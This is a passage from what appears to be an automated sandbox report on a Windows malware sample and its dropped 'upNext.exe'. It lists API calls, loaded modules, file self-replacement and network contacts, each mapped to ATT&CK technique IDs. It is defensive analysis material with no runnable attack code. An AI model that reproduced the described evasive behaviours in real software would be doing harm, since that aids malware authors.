parameter FindNextUrlCacheEntryA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FindFirstUrlCacheEntryA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumValueA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DefWindowProcA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter EnumWindows (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetWindowThreadProcessId (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CreateWindowExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DestroyWindow (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetWindowLongA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceExA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VariantChangeTypeEx (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarNeg (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarNot (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarAdd (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarSub (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarMul (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarDiv (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarIdiv (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarMod (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarAnd (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarOr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarXor (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarCmp (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarI4FromStr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarR4FromStr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarR8FromStr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarDateFromStr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarCyFromStr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBoolFromStr (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromCy (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromDate (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter VarBstrFromBool (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter UninitializeFlatSB (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollProp (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_EnableScrollBar (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_ShowScrollBar (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollRange (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollRange (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter SetLayeredWindowAttributes (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetMonitorInfoA (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetSystemMetrics (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter EnumDisplayMonitors (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter DwmIsCompositionEnabled (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetLayout (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GdiRealizationInfo (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter FontIsLinked (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetTextFaceAliasW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GetFontAssocStatus (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter GdiIsMetaPrintDC (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter AnimateWindow (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoCreateInstanceEx (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleIconToCursor (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreateFontIndirect (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePictureIndirect (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleLoadPicture (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleTranslateColor (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrame (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrameIndirect (UID: 00000000-00001484)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00001484)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70720000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"KERNEL32\" at base 76fe0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a000000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"KERNEL32.DLL\" at base 76fe0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"USER32.DLL\" at base 77380000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"ADVAPI32.DLL\" at base 76dd0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"VERSION.DLL\" at base 745a0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"WSOCK32.DLL\" at base 706c0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75150000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"WININET.DLL\" at base 76b20000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"SHFOLDER.DLL\" at base 6baa0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"OLE32.DLL\" at base 765f0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ba0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"DWMAPI.DLL\" at base 73be0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"OLEPRO32.DLL\" at base 6cab0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74ad0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74630000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 737c0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 730f0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771e0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"RPCRT4.DLL\" at base 76520000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 730d0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"DNSAPI.DLL\" at base 74990000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 730c0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"WS2_32.DLL\" at base 771a0000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"IPHLPAPI.DLL\" at base 73480000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73560000\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"RASADHLP.DLL\" at base 71750000\n \"upNext.exe\" loaded module \"KERNEL32.DLL\" at base 76fe0000\n \"upNext.exe\" loaded module \"USER32.DLL\" at base 77380000\n \"upNext.exe\" loaded module \"ADVAPI32.DLL\" at base 76dd0000\n \"upNext.exe\" loaded module \"VERSION.DLL\" at base 745a0000\n \"upNext.exe\" loaded module \"WSOCK32.DLL\" at base 706c0000\n \"upNext.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 75150000\n \"upNext.exe\" loaded module \"WININET.DLL\" at base 76b20000\n \"upNext.exe\" loaded module \"SHFOLDER.DLL\" at base 70600000\n \"upNext.exe\" loaded module \"OLE32.DLL\" at base 765f0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ba0000\n \"upNext.exe\" loaded module \"DWMAPI.DLL\" at base 73be0000\n \"upNext.exe\" loaded module \"OLEPRO32.DLL\" at base 6ca70000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 74ad0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74630000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NLAAPI.DLL\" at base 737c0000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NAPINSP.DLL\" at base 730f0000\n \"upNext.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 771e0000\n \"upNext.exe\" loaded module \"RPCRT4.DLL\" at base 76520000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PNRPNSP.DLL\" at base 730d0000\n \"upNext.exe\" loaded module \"DNSAPI.DLL\" at base 74990000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WINRNR.DLL\" at base 730c0000\n \"upNext.exe\" loaded module \"WS2_32.DLL\" at base 771a0000\n \"upNext.exe\" loaded module \"IPHLPAPI.DLL\" at base 73480000\n \"upNext.exe\" loaded module \"%WINDIR%\\SYSTEM32\\FWPUCLNT.DLL\" at base 73560000\n \"upNext.exe\" loaded module \"RASADHLP.DLL\" at base 71750000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e096a@advapi32.dll\"\n \"0e000f00703f096a@advapi32.dll\"\n \"0e000f00cc3f096a@advapi32.dll\"\n \"11001200b447096a@advapi32.dll\"\n \"110012004848096a@advapi32.dll\"\n \"120013008c48096a@advapi32.dll\"\n \"12001300e448096a@advapi32.dll\"\n \"14001500386e096a@advapi32.dll\"\n \"14001500506e096a@advapi32.dll\"\n \"14001500686e096a@advapi32.dll\"\n \"17001800806e096a@advapi32.dll\"\n \"0d000e00986e096a@advapi32.dll\"\n \"11001200a86e096a@advapi32.dll\"\n \"11001200bc6e096a@advapi32.dll\"\n \"0f001000fc6f096a@advapi32.dll\"\n \"140015003c70096a@advapi32.dll\"\n \"140015005470096a@advapi32.dll\"\n \"0c000d009c70096a@advapi32.dll\"\n \"0c000d00ac70096a@advapi32.dll\"\n \"0e000f00bc70096a@advapi32.dll\"\n \"0e000f00cc70096a@advapi32.dll\"\n \"0b000c00dc70096a@advapi32.dll\"\n \"180019001473096a@RPCRT4.dll\"\n \"130014004073096a@RPCRT4.dll\"\n \"140015005473096a@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter SHFolder.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.ENU (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.EN (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter olepro32.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00005952)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter SHFolder.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %LOCALAPPDATA%\\upNext.ENU (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %LOCALAPPDATA%\\upNext.EN (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter olepro32.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00001484)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00001484)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-224", "type": 6, "relevance": 1, "name": "Calls an API typically used to move file or directory", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"MoveFileA\" with parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe & C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.del (UID: 00000000-00005952)\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" called \"MoveFileA\" with parameter C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.tmp & C:\\29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe (UID: 00000000-00005952)\n \"upNext.exe\" called \"MoveFileA\" with parameter %LOCALAPPDATA%\\upNext.exe & %LOCALAPPDATA%\\upNext.del (UID: 00000000-00001484)\n \"upNext.exe\" called \"MoveFileA\" with parameter %LOCALAPPDATA%\\upNext.tmp & %LOCALAPPDATA%\\upNext.exe (UID: 00000000-00001484)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76520000\n \"upNext.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76520000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"upNext.exe\" with commandline \"--i\" (UID: 00000000-00001484)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"upNext.exe\" (UID: 00000000-00001484) was launched with new environment variables: \"PROMPT=\"$P$G\"\"\n Process \"upNext.exe\" (UID: 00000000-00001484) was launched with modified environment variables: \"PSModulePath, PATHEXT\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"upNext.exe\" with commandline \"--i\" (UID: 00000000-00001484)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"29ed4d2479ab0cfdc61bfb2f87f81463af3f3dbc61c015d2bc013550b32627a9\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"upNext.exe.bin\" was detected as \"Borland Delphi\" and name: \"Compiler\"\n \"upNext.tmp\" was detected as \"Borland Delphi\" and name: \"Compiler\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-1R-ZKTkxxIsAhV-kWt7Qog' 